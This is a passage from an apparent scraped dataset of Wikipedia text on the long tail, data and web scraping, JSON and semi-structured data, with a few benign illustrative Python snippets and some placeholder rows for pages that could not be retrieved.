needs and preferences, which can help drive product development and innovation. By creating a platform for their users to share their ideas and feedback, companies can harness the power of collaborative innovation and stay ahead of the competition. Ultimately, involving users in the innovation process is a win-win for both companies and their customers, as it leads to more tailored, effective products and services that better meet the needs of the end user.
The drive to build a market and obtain revenue from the consumer demographic of the long tail has led businesses to implement a series of long-tail marketing techniques, most of them based on extensive use of internet technologies. The long tail has possible implications for culture and politics. Where the opportunity cost of inventory storage and distribution is high, only the most popular products are sold. But where the long tail works, minority tastes become available and individuals are presented with a wider array of choices. The long tail presents opportunities for various suppliers to introduce products in the niche category. These encourage the diversification of products. These niche products open opportunities for suppliers while concomitantly satisfying the demands of many individuals, thereby lengthening the tail portion of the long tail. In situations where popularity is currently determined by the lowest common denominator, a long-tail model may lead to improvement in a society's level of culture. The opportunities that arise because of the long tail greatly affect society's cultures, because suppliers have unlimited capacity due to effectively infinite storage, and demands that could not be met prior to the long tail are realized. At the end of the long tail, the conventional profit-making business model ceases to exist; instead, people tend to come up with products for varied reasons like expression rather than monetary benefit. In this way, the long tail opens up a large space for authentic works of creativity. Television is a good example of this: Chris Anderson defines long-tail TV in the context of "content that is not available through traditional distribution channels but could nevertheless find an audience". 36 Thus, the advent of services such as television on demand, pay-per-view and even premium cable subscription services such as HBO and Showtime opens up the opportunity for niche content to reach the right audiences, in an otherwise mass medium. These may not always attract the highest level of viewership, but their business distribution models make that less important. As the opportunity cost goes down, the choice of TV programs grows and cultural diversity increases. Often presented as a phenomenon of interest primarily to mass-market retailers and web-based businesses, the long tail also has implications for the producers of content, especially those whose products could not, for economic reasons, find a place in pre-Internet information distribution channels controlled by book publishers, record companies, movie studios, and television networks. Looked at from the producers' side, the long tail has made possible a flowering of creativity across all fields of human endeavour. One example of this is YouTube, where thousands of diverse videos whose content, production value or lack of popularity make them inappropriate for traditional television are easily accessible to a wide range of viewers. The intersection of viral marketing, online communities and new technologies that operate within the long tail of consumers and business is described in William Gibson's novel Pattern Recognition. In military thinking, John Robb applies the long tail to the developments in insurgency and terrorist movements, showing how technology and networking allow the long tail of disgruntled groups and criminals to take on the nation state and have a chance to win.
A 2008 study by Anita Elberse, professor of business administration at Harvard Business School, calls the long tail theory into question, citing sales data which shows that the Web magnifies the importance of blockbuster hits. 37 On his blog, Chris Anderson responded to the study, praising Elberse and the academic rigor with which she explores the issue but drawing a distinction between their respective interpretations of where the "head" and "tail" begin. Elberse defined head and tail using percentages, while Anderson uses absolute numbers. 38 Similar results were published by Serguei Netessine and Tom F. Tan, who suggest that head and tail should be defined by percentages rather than absolute numbers. 39 Also in 2008, a sales analysis of an unnamed UK digital music service by economist Will Page and high-tech entrepreneur Andrew Bud found that sales exhibited a log-normal distribution rather than a power law; they reported that 80% of the music tracks available sold no copies at all over a one-year period. Anderson responded by stating that the study's findings are difficult to assess without access to its data. 40 41 |
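The concentration comparisons above (an 80/20 split in the catalog channel versus roughly 72/28 online, and the debate over whether the rank-sales slope is constant) can be made concrete with a small numeric sketch. The snippet below is illustrative only: the catalogue size and exponents are arbitrary assumptions, not figures from the studies cited. It simulates a Zipf-like power-law sales curve and reports what share of total sales the top 20% of titles would capture.

import numpy as np

def top_share(num_titles, exponent, top_fraction=0.2):
    # Relative sales under a power law: sales(rank) is proportional to rank ** (-exponent).
    ranks = np.arange(1, num_titles + 1, dtype=float)
    sales = ranks ** (-exponent)
    cutoff = int(num_titles * top_fraction)
    return sales[:cutoff].sum() / sales.sum()

# Arbitrary illustration: a steeper exponent concentrates sales in the head,
# while a shallower exponent pushes more volume into the tail.
for exponent in (1.0, 0.8):
    share = top_share(100_000, exponent)
    print(f"exponent {exponent}: top 20% of titles capture {share:.0%} of sales")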
572 | https://en.wikipedia.org/wiki/Data_scraping | https://tr.wikipedia.org/wiki/Veri_kaz%C4%B1ma | Data scraping is a technique in which a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is carried out using data structures suited to automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, easily parsed, well documented, and keep ambiguity to a minimum; very often these transmissions are not human-readable at all. 1 Thus, the element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end user rather than as input to another program, and is therefore usually neither documented nor conveniently structured for parsing. Data scraping generally involves ignoring binary data (usually images or multimedia), display formatting, redundant labels, superfluous commentary, and other information that is irrelevant or hinders automated processing. Data scraping is most often done either to interface with a legacy system that has no other mechanism compatible with current hardware, or to interface with a third-party system that does not provide a more convenient API. In the second case, the operator of the third-party system will often regard screen scraping as unwanted, for reasons such as increased system load, loss of advertising revenue, or loss of control over the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a last resort when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program that has been told to read data in a particular format or from a particular place, with no knowledge of how to check its results for validity, may report nonsense. Screen scraping is normally associated with the programmatic collection of visual data from a source, rather than with parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from the screen of a computer display terminal. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data; this may involve simple cases where the controlling program navigates the user interface, or more complex scenarios where the controlling program enters data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s, the dawn of computerized data processing. Computer user interfaces from that era were often simply text-based dumb terminals that were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things that are no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only solution may be to write a screen scraper that behaves as if it were a user at a terminal. The screen scraper might connect to the legacy system over Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system.

(A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise, for example change control, security, user management, data protection, operational audit, load balancing, and queue management, could be said to be an example of robotic process automation software.) In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture this character data and convert it into numeric data for inclusion in calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 2 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. In the case of GUI applications, this can be combined with querying the graphical controls by programmatically obtaining references to their underlying programming objects. Web scraping: web pages are built using text-based mark-up languages (HTML and XHTML) and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end users, not for ease of automated use; because of this, tool kits that scrape web content have been created. A web scraper is an API for extracting data from a website. Companies such as Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end users. Newer forms of web scraping involve listening to data feeds from web servers; for example, JSON is commonly used as a transport and storage mechanism between the client and the web server. Recently, companies have developed web scraping systems that rely on DOM parsing, computer vision, and natural language processing techniques to simulate the human processing that occurs when viewing a web page, in order to extract useful information automatically. 3 4 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options and directing the output to a spool file instead of a printer, static reports suitable for offline analysis can be generated via report mining. This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can easily be obtained from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple way to obtain the data without the need to program an API for the source system. |
573 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:UrlShortener&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FData_scraping | (No article content was retrieved; the request returned a Wikipedia IP-block notice instead of a page.) |
574 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-9 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner.
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
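As a rough illustration of the web-scraping approach described in this entry, the sketch below fetches a page and pulls the visible text out of selected elements with the requests and BeautifulSoup libraries. The URL and CSS selector are placeholder assumptions, and any real use should respect a site's terms of service, robots.txt, and rate limits.

import requests
from bs4 import BeautifulSoup

def scrape_text(url, selector="table tr"):
    # Fetch the page and return the visible text of every element matching the selector.
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    soup = BeautifulSoup(response.text, "html.parser")
    return [element.get_text(" ", strip=True) for element in soup.select(selector)]

# Hypothetical usage; the URL below is a placeholder, not a real endpoint:
# rows = scrape_text("https://example.com/report.html")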
575 | https://en.wikipedia.org/wiki/Data_scraping | https://pl.wikipedia.org/wiki/Screen_scraping | Screen scraping (literally 'scraping off the screen') is a technique by which a computer program extracts data from the output of another program. The program used for this purpose is called a screen scraper. The main element distinguishing screen scraping from parsing is that the output being scraped is intended for a human, not for interpretation by a machine. Screen scraping has many synonyms: data scraping, data extraction, web scraping, page scraping, and HTML scraping (the last three of which refer to web pages). Usually, data transfer between programs takes place via data structures suited to machines, not people. Such structures are most often well ordered, easy to parse, and keep ambiguity and duplication to a minimum. Very often they are unreadable to a human. Output intended for a human is the opposite of this: formatting, redundant labels, comments, and other information are not only unnecessary to a machine but can also make interpreting the data more difficult. However, if the output is available only in such a human-friendly format, screen scraping becomes the only automated way to carry out the data transfer. Originally, the term referred to reading data from the screen memory of a computer terminal. By analogy, screen scraping also refers to the computerized processing of HTML on web pages. In either case, the screen scraper must be programmed not only to process the data of interest but also to discard unwanted information and formatting. Screen scraping is considered an inelegant technique, used only as a last resort when no other mechanism is available. Apart from the greater effort that must be put into programming, data intended for humans frequently change structure. People cope with this without difficulty, but computer programs in such cases stop working or (worse) return incorrect results. |
576 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/JSON | JSON (JavaScript Object Notation, pronounced d e s n or d e s n ) is an open standard file format and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute value pairs and arrays (or other serializable values). It is a commonly used data format with diverse uses in electronic data interchange, including that of web applications with servers. JSON is a language-independent data format. It was derived from JavaScript, but many modern programming languages include code to generate and parse JSON-format data. JSON filenames use the extension .json. Douglas Crockford originally specified the JSON format in the early 2000s. 1 He and Chip Morningstar sent the first JSON message in April 2001. The 2017 international standard (ECMA 404 and ISO IEC 21778:2017) specifies that "JSON" is "pronounced d e .s n , as in 'Jason and The Argonauts' . 2 3 The first (2013) edition of ECMA 404 did not address the pronunciation. 4 The UNIX and Linux System Administration Handbook states, "Douglas Crockford, who named and promoted the JSON format, says it's pronounced like the name Jason. But somehow, 'JAY-sawn' a seems to have become more common in the technical community. 5 Crockford said in 2011, "There's a lot of argument about how you pronounce that, but I strictly don't care. 1 After RFC 4627 had been available as its "informational" specification since 2006, JSON was first standardized in 2013, as ECMA 404. 4 RFC 8259, published in 2017, is the current version of the Internet Standard STD 90, and it remains consistent with ECMA 404. 6 That same year, JSON was also standardized as ISO IEC 21778:2017. 2 The ECMA and ISO IEC standards describe only the allowed syntax, whereas the RFC covers some security and interoperability considerations. 7 JSON grew out of a need for a real-time server-to-browser session communication protocol without using browser plugins such as Flash or Java applets, the dominant methods used in the early 2000s. 8 Crockford first specified and popularized the JSON format. 1 The acronym originated at State Software, a company cofounded by Crockford and others in March 2001. The cofounders agreed to build a system that used standard browser capabilities and provided an abstraction layer for Web developers to create stateful Web applications that had a persistent duplex connection to a Web server by holding two Hypertext Transfer Protocol (HTTP) connections open and recycling them before standard browser time-outs if no further data were exchanged. The cofounders had a round-table discussion and voted on whether to call the data format JSML (JavaScript Markup Language) or JSON (JavaScript Object Notation), as well as under what license type to make it available. The JSON.org 9 website was launched in 2001. In December 2005, Yahoo began offering some of its Web services in JSON. 10 A precursor to the JSON libraries was used in a children's digital asset trading game project named Cartoon Orbit at Communities.com citation needed (the State cofounders had all worked at this company previously) for Cartoon Network citation needed , which used a browser side plug-in with a proprietary messaging format to manipulate DHTML elements (this system is also owned by 3DO citation needed ). 
Upon discovery of early Ajax capabilities, digiGroups, Noosh, and others used frames to pass information into the user browsers' visual field without refreshing a Web application's visual context, realizing real-time rich Web applications using only the standard HTTP, HTML, and JavaScript capabilities of Netscape 4.0.5 and Internet Explorer 5. Crockford then found that JavaScript could be used as an object-based messaging format for such a system. The system was sold to Sun Microsystems, Amazon.com, and EDS. JSON was based on a subset of the JavaScript scripting language (specifically, Standard ECMA-262 3rd Edition—December 1999 11) and is commonly used with JavaScript, but it is a language-independent data format. Code for parsing and generating JSON data is readily available in many programming languages. JSON's website lists JSON libraries by language. In October 2013, Ecma International published the first edition of its JSON standard ECMA-404. 4 That same year, RFC 7158 used ECMA-404 as a reference. In 2014, RFC 7159 became the main reference for JSON's Internet uses, superseding RFC 4627 and RFC 7158 (but preserving ECMA-262 and ECMA-404 as main references). In November 2017, ISO/IEC JTC 1/SC 22 published ISO/IEC 21778:2017 2 as an international standard. On December 13, 2017, the Internet Engineering Task Force obsoleted RFC 7159 when it published RFC 8259, which is the current version of the Internet Standard STD 90. 12 13 Crockford added a clause to the JSON license stating, "The Software shall be used for Good, not Evil", in order to open-source the JSON libraries while mocking corporate lawyers and those who are overly pedantic. On the other hand, this clause led to license compatibility problems of the JSON license with other open-source licenses, since open-source software and free software usually imply no restrictions on the purpose of use. 14 The following example shows a possible JSON representation describing a person. Although Crockford originally asserted that JSON is a strict subset of JavaScript and ECMAScript, 15 his specification actually allows valid JSON documents that are not valid JavaScript; JSON allows the Unicode line terminators U+2028 LINE SEPARATOR and U+2029 PARAGRAPH SEPARATOR to appear unescaped in quoted strings, while ECMAScript 2018 and older do not. 16 17 This is a consequence of JSON disallowing only "control characters". For maximum portability, these characters should be backslash-escaped. JSON exchange in an open ecosystem must be encoded in UTF-8. 6 The encoding supports the full Unicode character set, including those characters outside the Basic Multilingual Plane (U+0000 to U+FFFF). However, if escaped, those characters must be written using UTF-16 surrogate pairs. For example, the Emoji character U+1F610 NEUTRAL FACE is written in escaped form as the surrogate pair \uD83D\uDE10. JSON became a strict subset of ECMAScript as of the language's 2019 revision. 17 18 JSON's basic data types are number, string, Boolean, array, object, and null. Whitespace is allowed and ignored around or between syntactic elements (values and punctuation, but not within a string value). Four specific characters are considered whitespace for this purpose: space, horizontal tab, line feed, and carriage return. In particular, the byte order mark must not be generated by a conforming implementation (though it may be accepted when parsing JSON). JSON does not provide syntax for comments.
21 Early versions of JSON (such as specified by RFC 4627) required that a valid JSON text must consist of only an object or an array type, which could contain other types within them. This restriction was dropped in RFC 7158, where a JSON text was redefined as any serialized value. Numbers in JSON are agnostic with regard to their representation within programming languages. While this allows for numbers of arbitrary precision to be serialized, it may lead to portability issues. For example, since no differentiation is made between integer and floating-point values, some implementations may treat 42, 42.0, and 4.2E+1 as the same number, while others may not. The JSON standard makes no requirements regarding implementation details such as overflow, underflow, loss of precision, rounding, or signed zeros, but it does recommend expecting no more than IEEE 754 binary64 precision for "good interoperability". There is no inherent precision loss in serializing a machine-level binary representation of a floating-point number (like binary64) into a human-readable decimal representation (like numbers in JSON) and back, since there exist published algorithms to do this exactly and optimally. 22 Comments were intentionally excluded from JSON. In 2012, Douglas Crockford described his design decision thus: "I removed comments from JSON because I saw people were using them to hold parsing directives, a practice which would have destroyed interoperability." 21 JSON disallows "trailing commas", a comma after the last value inside a data structure. 23 Trailing commas are a common feature of JSON derivatives to improve ease of use. 24 RFC 8259 describes certain aspects of JSON syntax that, while legal per the specifications, can cause interoperability problems. In 2015, the IETF published RFC 7493, describing the "I-JSON Message Format", a restricted profile of JSON that constrains the syntax and processing of JSON to avoid, as much as possible, these interoperability issues. While JSON provides a syntactic framework for data interchange, unambiguous data interchange also requires agreement between producer and consumer on the semantics of specific use of the JSON syntax. 25 One example of where such an agreement is necessary is the serialization of data types that are not part of the JSON standard, for example, dates and regular expressions. The official MIME type for JSON text is application/json, 26 and most modern implementations have adopted this. Legacy MIME types include text/json, text/x-json, and text/javascript. 27 JSON Schema specifies a JSON-based format to define the structure of JSON data for validation, documentation, and interaction control. It provides a contract for the JSON data required by a given application and how that data can be modified. 28 JSON Schema is based on the concepts from XML Schema (XSD) but is JSON-based. As in XSD, the same serialization/deserialization tools can be used both for the schema and data, and it is self-describing. It is specified in an Internet Draft at the IETF, with the latest version as of 2024 being "Draft 2020-12". 29 There are several validators available for different programming languages, 30 each with varying levels of conformance. The standard filename extension is .json. 31 The JSON standard does not support object references, but an IETF draft standard for JSON-based object references exists. 32 JSON-RPC is a remote procedure call (RPC) protocol built on JSON, as a replacement for XML-RPC or SOAP.
It is a simple protocol that defines only a handful of data types and commands. JSON-RPC lets a system send notifications (information to the server that does not require a response) and multiple calls to the server that can be answered out of order. Asynchronous JavaScript and JSON (or AJAJ) refers to the same dynamic web page methodology as Ajax, but instead of XML, JSON is the data format. AJAJ is a web development technique that provides for the ability of a web page to request new data after it has loaded into the web browser. Typically, it renders new data from the server in response to user actions on that web page. For example, what the user types into a search box, client-side code then sends to the server, which immediately responds with a drop-down list of matching database items. JSON has seen ad hoc usage as a configuration language. However, it does not support comments. In 2012, Douglas Crockford, JSON creator, had this to say about comments in JSON when used as a configuration language: "I know that the lack of comments makes some people sad, but it shouldn't. Suppose you are using JSON to keep configuration files, which you would like to annotate. Go ahead and insert all the comments you like. Then pipe it through JSMin 33 before handing it to your JSON parser. 21 MongoDB uses JSON-like data for its document-oriented database. Some relational databases, such as PostgreSQL and MySQL, have added support for native JSON data types. This allows developers to store JSON data directly in a relational database without having to convert it to another data format. JSON being a subset of JavaScript can lead to the misconception that it is safe to pass JSON texts to the JavaScript eval() function. This is not safe, due to certain valid JSON texts, specifically those containing U 2028 LINE SEPARATOR or U 2029 PARAGRAPH SEPARATOR, not being valid JavaScript code until JavaScript specifications were updated in 2019, and so older engines may not support it. 34 To avoid the many pitfalls caused by executing arbitrary code from the Internet, a new function, JSON.parse(), was first added to the fifth edition of ECMAScript, 35 which as of 2017 is supported by all major browsers. For non-supported browsers, an API-compatible JavaScript library is provided by Douglas Crockford. 36 In addition, the TC39 proposal "Subsume JSON" made ECMAScript a strict JSON superset as of the language's 2019 revision. 17 18 Various JSON parser implementations have suffered from denial-of-service attack and mass assignment vulnerability. 37 38 JSON is promoted as a low-overhead alternative to XML as both of these formats have widespread support for creation, reading, and decoding in the real-world situations where they are commonly used. 39 Apart from XML, examples could include CSV and supersets of JSON. Google Protocol Buffers can fill this role, although it is not a data interchange language. CBOR has a superset of the JSON data types, but it is not text-based. XML has been used to describe structured data and to serialize objects. Various XML-based protocols exist to represent the same kind of data structures as JSON for the same kind of data interchange purposes. Data can be encoded in XML in several ways. The most expansive form using tag pairs results in a much larger (in character count) representation than JSON, but if data is stored in attributes and 'short tag' form where the closing tag is replaced with , the representation is often about the same size as JSON or just a little larger. 
However, an XML attribute can only have a single value and each attribute can appear at most once on each element. XML separates "data" from "metadata" (via the use of elements and attributes), while JSON does not have such a concept. Another key difference is the addressing of values. JSON has objects with a simple "key" to "value" mapping, whereas in XML addressing happens on "nodes", which all receive a unique ID via the XML processor. Additionally, the XML standard defines a common attribute xml:id, that can be used by the user, to set an ID explicitly. XML tag names cannot contain any of the characters () , ; ? , nor a space character, and cannot begin with , ., or a numeric digit, whereas JSON keys can (even if quotation mark and backslash must be escaped). 40 XML values are strings of characters, with no built-in type safety. XML has the concept of schema, that permits strong typing, user-defined types, predefined tags, and formal structure, allowing for formal validation of an XML stream. JSON has several types built-in and has a similar schema concept in JSON Schema. XML supports comments, while JSON does not. 41 21 Support for comments and other features have been deemed useful, which has led to several nonstandard JSON supersets being created. Among them are HJSON, 42 HOCON, and JSON5 (which despite its name, is not the fifth version of JSON). 43 44 YAML version 1.2 is a superset of JSON; prior versions were not strictly compatible. For example, escaping a slash with a backslash is valid in JSON, but was not valid in YAML. 45 YAML supports comments, while JSON does not. 45 43 21 CSON ("CoffeeScript Object Notation") uses significant indentation, unquoted keys, and assumes an outer object declaration. It was used for configuring GitHub's Atom text editor. 46 47 48 There is also an unrelated project called CSON ("Cursive Script Object Notation") that is more syntactically similar to JSON. 49 HOCON ("Human-Optimized Config Object Notation") is a format for human-readable data, and a superset of JSON. 50 The uses of HOCON are: JSON5 ("JSON5 Data Interchange Format") is an extension of JSON syntax that just like JSON is also valid JavaScript syntax. The specification was started in 2012 and finished in 2018 with version 1.0.0. 61 The main differences to JSON syntax are: JSON5 syntax is supported in some software as an extension of JSON syntax, for instance in SQLite. 62 JSONC (JSON with Comments) is a subset of JSON5 used in Microsoft's Visual Studio Code: 63 Several serialization formats have been built on or from the JSON specification. Examples include |
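To make the serialization and portability points above concrete, here is a minimal sketch using Python's standard json module; the record shown is invented for illustration. It round-trips a value and shows how U+2028, which is legal inside JSON strings but was not legal in pre-2019 JavaScript string literals, is escaped by default.

import json

# An invented record containing an object, an array, and a U+2028 LINE SEPARATOR.
doc = {"name": "Ada", "languages": ["Python", "JavaScript"], "note": "line one\u2028line two"}

text = json.dumps(doc)      # serialize; non-ASCII characters are \u-escaped by default
parsed = json.loads(text)   # parse back into Python objects
assert parsed == doc

# ensure_ascii=False emits the raw U+2028 character instead of the escape sequence,
# which older JavaScript engines could not accept inside string literals.
print(json.dumps(doc, ensure_ascii=False, indent=2))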
577 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Template_talk:Information_security | I've been trying to figure out how to merge the different computer security articles Mobile security, Computer security, Cyber security and countermeasure, Network security, Internet security, World Wide Web security, Information security, Cyberwarfare, etc. and thought a great way to start would be to alert everyone of the existence of a wide range of unsynched and duplicate content, using this template. I welcome comments and additions - I know my list is incomplete. Timtempleton (talk) 22:15, 24 April 2014 (UTC) reply Information security is the broader parent topic. Moved template to title, Information security. Sagecandor (talk) 06:04, 21 December 2016 (UTC) reply |
578 | https://en.wikipedia.org/wiki/Data_scraping | https://fa.wikipedia.org/wiki/%D8%AA%D8%B1%D8%A7%D8%B4%E2%80%8C%D8%AF%D8%A7%D8%AF%D9%86_%D8%AF%D8%A7%D8%AF%D9%87 | (Persian-language article on data scraping; the non-Latin text was stripped during scraping, leaving only scattered Latin fragments such as "Data scraping", "IBM 3270", "HTML XHTML", "JSON", "DOM", and "API", so no readable content remains.) |
579 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Semi-structured_data | Semi-structured data 1 is a form of structured data that does not obey the tabular structure of data models associated with relational databases or other forms of data tables, but nonetheless contains tags or other markers to separate semantic elements and enforce hierarchies of records and fields within the data. Therefore, it is also known as self-describing structure. In semi-structured data, the entities belonging to the same class may have different attributes even though they are grouped together, and the attributes' order is not important. Semi-structured data are increasingly occurring since the advent of the Internet where full-text documents and databases are not the only forms of data anymore, and different applications need a medium for exchanging information. In object-oriented databases, one often finds semi-structured data. XML, 2 other markup languages, email, and EDI are all forms of semi-structured data. OEM (Object Exchange Model) 3 was created prior to XML as a means of self-describing a data structure. XML has been popularized by web services that are developed utilizing SOAP principles. Some types of data described here as "semi-structured", especially XML, suffer from the impression that they are incapable of structural rigor at the same functional level as Relational Tables and Rows. Indeed, the view of XML as inherently semi-structured (previously, it was referred to as "unstructured") has handicapped its use for a widening range of data-centric applications. Even documents, normally thought of as the epitome of semi-structure, can be designed with virtually the same rigor as database schema, enforced by the XML schema and processed by both commercial and custom software programs without reducing their usability by human readers. In view of this fact, XML might be referred to as having "flexible structure" capable of human-centric flow and hierarchy as well as highly rigorous element structure and data typing. The concept of XML as "human-readable", however, can only be taken so far. Some implementations dialects of XML, such as the XML representation of the contents of a Microsoft Word document, as implemented in Office 2007 and later versions, utilize dozens or even hundreds of different kinds of tags that reflect a particular problem domain - in Word's case, formatting at the character and paragraph and document level, definitions of styles, inclusion of citations, etc. - which are nested within each other in complex ways. Understanding even a portion of such an XML document by reading it, let alone catching errors in its structure, is impossible without a very deep prior understanding of the specific XML implementation, along with assistance by software that understands the XML schema that has been employed. Such text is not "human-understandable" any more than a book written in Swahili (which uses the Latin alphabet) would be to an American or Western European who does not know a word of that language: the tags are symbols that are meaningless to a person unfamiliar with the domain. JSON or JavaScript Object Notation, is an open standard format that uses human-readable text to transmit data objects. JSON has been popularized by web services developed utilizing REST principles. Databases such as MongoDB and Couchbase store data natively in JSON format, leveraging the pros of semi-structured data architecture. 
The semi-structured model is a database model where there is no separation between the data and the schema, and the amount of structure used depends on the purpose. The advantages of this model are the following: The primary trade-off being made in using a semi-structured database model is that queries cannot be made as efficiently as in a more constrained structure, such as in the relational model. Typically the records in a semi-structured database are stored with unique IDs that are referenced with pointers to their location on disk. This makes navigational or path-based queries quite efficient, but for doing searches over many records (as is typical in SQL), it is not as efficient because it has to seek around the disk following pointers. The Object Exchange Model (OEM) is one standard to express semi-structured data, another way is XML. |
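A short sketch of the "same class, different attributes" property described above, using JSON handled with Python's standard json module; the field names are invented for illustration.

import json

# Two records of the same "person" class; the second adds an attribute and omits
# another, which a fixed relational schema would not accept without changes.
records = json.loads("""
[
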